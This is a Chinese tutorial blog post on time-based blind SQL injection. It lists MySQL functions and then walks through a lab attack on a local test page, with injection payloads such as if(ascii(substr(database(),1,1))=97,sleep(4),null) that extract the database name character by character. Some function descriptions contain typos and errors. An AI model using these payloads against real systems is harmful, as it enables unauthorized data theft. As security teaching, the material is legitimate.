大数据中基于时间盲注的实例分析

发布时间:2021-12-10 09:24:00 作者:柒染
来源:亿速云 阅读:143

大数据中基于时间盲注的实例分析,针对这个问题,这篇文章详细介绍了相对应的分析和解答,希望可以帮助更多想解决这个问题的小伙伴找到更简单易行的方法。

一、函数介绍

1、sleep(5):暂停5秒再返回结果

2、if(条件,表达式1,表达式2):如果条件为真,返回表达式1,否则返回表达式2

3、substr('admin',2,3):从第二个位置开始截取长度为3的字符串,即dmi

4、substring('admin',2,3):效果和上面一样

5、substring('admin' from 2 for 1):截取一个字母,省略了逗号

6、substring('admin' from 2):从第二个字母开始截取

7、substring_index('1223334444','4',3):截取到4出现的第三次,即12233344

8、rlike '^12' 或者regext '^12':正则判断是不是从12开头的字符串  例子:select * from user where pass regexp '^12';

9、case when...then...end:判断条件,如果查询有结果返回,否则返回什么,例子:select case when username='admin' then 'admin' else 'xxx' end from user; 

10、sdcii():获取字母的ASCII码

11、benchmark():重复执行,例子:benchmark(10000000,sha(1))

12、select count(*) from user a , uer b ;  select count(*) from user 得到结果再乘以结果

13、mid():截取函数,mid("aiyoubucuo",1,1)mid("aiyoubucuo" from 1 for 1); 结果都为1

14、left()/right():从左/从右截取的字符串 left("aiyou",1) right("aiyou",1)

15、ord():ord("abc"),返回结果为首字母的ASCII码,a

16、asc/desc:升序/降序排列  order by id asc;

二、实例操作

1、访问:http://192.168.152.128/aiyou/1.php?id=2

大数据中基于时间盲注的实例分析

2、构造条件语句:

http://192.168.152.128/aiyou/1.php?id=2' and 1=1 --+

大数据中基于时间盲注的实例分析

3、判断数据库名称

将条件改为:if(ascii(substr(database(),1,1))=97,sleep(4),null),如果数据库的第一个是a,就暂停4秒

大数据中基于时间盲注的实例分析

不停修改数字,直到106,发现停留了4秒,说明数据库的第一个字母是j

大数据中基于时间盲注的实例分析

再将1修改为2,判断数据库名字的第二个字母,发现正好是a

大数据中基于时间盲注的实例分析

关于大数据中基于时间盲注的实例分析问题的解答就分享到这里了,希望以上内容可以对大家有一定的帮助,如果你还有很多疑惑没有解开,可以关注亿速云行业资讯频道了解更多相关知识。

推荐阅读:
  1. burp盲注小技巧
  2. 盲注(时间差、延迟注入)

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

大数据

上一篇:Hadoop SequenceFile BLOCK压缩类型文件数据丢失怎么办

下一篇:Hadoop生态系统的知识点有哪些

相关阅读

您好,登录后才能下订单哦!

密码登录
登录注册
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》